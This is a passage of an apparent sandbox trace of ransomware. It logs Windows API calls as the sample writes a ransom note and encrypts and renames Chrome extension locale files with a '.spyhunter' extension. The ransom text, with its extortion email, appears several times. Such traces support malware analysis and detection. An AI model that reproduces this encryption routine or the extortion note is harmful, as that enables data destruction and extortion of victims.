Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.spyhunter") returned 165 [0160.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0160.358] GetProcessHeap () returned 0x2c0000 [0160.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.358] GetProcessHeap () returned 0x2c0000 [0160.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.358] GetProcessHeap () returned 0x2c0000 [0160.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8298 | out: hHeap=0x2c0000) returned 1 [0160.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.359] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.359] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x25cea2b*, lpNumberOfBytesWritten=0x25ceb54*=0x127, lpOverlapped=0x0) returned 1 [0160.360] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.360] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb54*=0x2ac, lpOverlapped=0x0) returned 1 [0160.360] CloseHandle (hObject=0x9c) returned 1 [0160.361] GetProcessHeap () returned 0x2c0000 [0160.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8110 | out: hHeap=0x2c0000) returned 1 [0160.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceaf0 | out: pbBuffer=0x25ceaf0) returned 1 [0160.361] GetProcessHeap () returned 0x2c0000 [0160.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceae8*=0x30) returned 1 [0160.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0160.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.362] GetProcessHeap () returned 0x2c0000 [0160.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.362] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceaac*=0xd5, lpOverlapped=0x0) returned 1 [0160.363] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.363] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceaac*=0xd5, lpOverlapped=0x0) returned 1 [0160.363] GetProcessHeap () returned 0x2c0000 [0160.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.363] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.363] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceaec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x25ceaec*, lpNumberOfBytesWritten=0x25ceaac*=0x4, lpOverlapped=0x0) returned 1 [0160.363] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceaac*=0x30, lpOverlapped=0x0) returned 1 [0160.364] CloseHandle (hObject=0x9c) returned 1 [0160.364] GetProcessHeap () returned 0x2c0000 [0160.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.364] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.spyhunter") returned 165 [0160.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0160.365] GetProcessHeap () returned 0x2c0000 [0160.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.365] GetProcessHeap () returned 0x2c0000 [0160.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.365] GetProcessHeap () returned 0x2c0000 [0160.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc77e0 | out: hHeap=0x2c0000) returned 1 [0160.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceaf0 | out: pbBuffer=0x25ceaf0) returned 1 [0160.365] GetProcessHeap () returned 0x2c0000 [0160.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceae8*=0x30) returned 1 [0160.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0160.366] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.366] GetProcessHeap () returned 0x2c0000 [0160.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.367] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceaac*=0x1c2, lpOverlapped=0x0) returned 1 [0160.367] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.367] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceaac*=0x1c2, lpOverlapped=0x0) returned 1 [0160.368] GetProcessHeap () returned 0x2c0000 [0160.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.368] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.368] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceaec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x25ceaec*, lpNumberOfBytesWritten=0x25ceaac*=0x4, lpOverlapped=0x0) returned 1 [0160.368] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceaac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceaac*=0x30, lpOverlapped=0x0) returned 1 [0160.368] CloseHandle (hObject=0x9c) returned 1 [0160.368] GetProcessHeap () returned 0x2c0000 [0160.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.368] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.spyhunter") returned 165 [0160.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.spyhunter")) returned 1 [0160.369] GetProcessHeap () returned 0x2c0000 [0160.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.369] GetProcessHeap () returned 0x2c0000 [0160.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.369] GetProcessHeap () returned 0x2c0000 [0160.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7e00 | out: hHeap=0x2c0000) returned 1 [0160.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.370] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.370] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb48, lpOverlapped=0x0 | out: lpBuffer=0x25cea1f*, lpNumberOfBytesWritten=0x25ceb48*=0x127, lpOverlapped=0x0) returned 1 [0160.371] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.371] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb48*=0x2ac, lpOverlapped=0x0) returned 1 [0160.371] CloseHandle (hObject=0x9c) returned 1 [0160.371] GetProcessHeap () returned 0x2c0000 [0160.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7c78 | out: hHeap=0x2c0000) returned 1 [0160.371] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceae8 | out: pbBuffer=0x25ceae8) returned 1 [0160.372] GetProcessHeap () returned 0x2c0000 [0160.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceae0*=0x30) returned 1 [0160.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0160.373] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.373] GetProcessHeap () returned 0x2c0000 [0160.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.373] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceaa4*=0xd9, lpOverlapped=0x0) returned 1 [0160.374] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.374] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x25ceaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceaa4*=0xd9, lpOverlapped=0x0) returned 1 [0160.374] GetProcessHeap () returned 0x2c0000 [0160.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.374] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.374] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceaa4, lpOverlapped=0x0 | out: lpBuffer=0x25ceae4*, lpNumberOfBytesWritten=0x25ceaa4*=0x4, lpOverlapped=0x0) returned 1 [0160.374] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceaa4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceaa4*=0x30, lpOverlapped=0x0) returned 1 [0160.374] CloseHandle (hObject=0x9c) returned 1 [0160.374] GetProcessHeap () returned 0x2c0000 [0160.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.374] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.spyhunter") returned 165 [0160.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0160.376] GetProcessHeap () returned 0x2c0000 [0160.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.376] GetProcessHeap () returned 0x2c0000 [0160.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.376] GetProcessHeap () returned 0x2c0000 [0160.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7af0 | out: hHeap=0x2c0000) returned 1 [0160.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.377] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.377] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb40, lpOverlapped=0x0 | out: lpBuffer=0x25cea17*, lpNumberOfBytesWritten=0x25ceb40*=0x127, lpOverlapped=0x0) returned 1 [0160.378] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.378] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb40*=0x2ac, lpOverlapped=0x0) returned 1 [0160.378] CloseHandle (hObject=0x9c) returned 1 [0160.378] GetProcessHeap () returned 0x2c0000 [0160.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc88b8 | out: hHeap=0x2c0000) returned 1 [0160.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceae0 | out: pbBuffer=0x25ceae0) returned 1 [0160.378] GetProcessHeap () returned 0x2c0000 [0160.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cead8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cead8*=0x30) returned 1 [0160.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 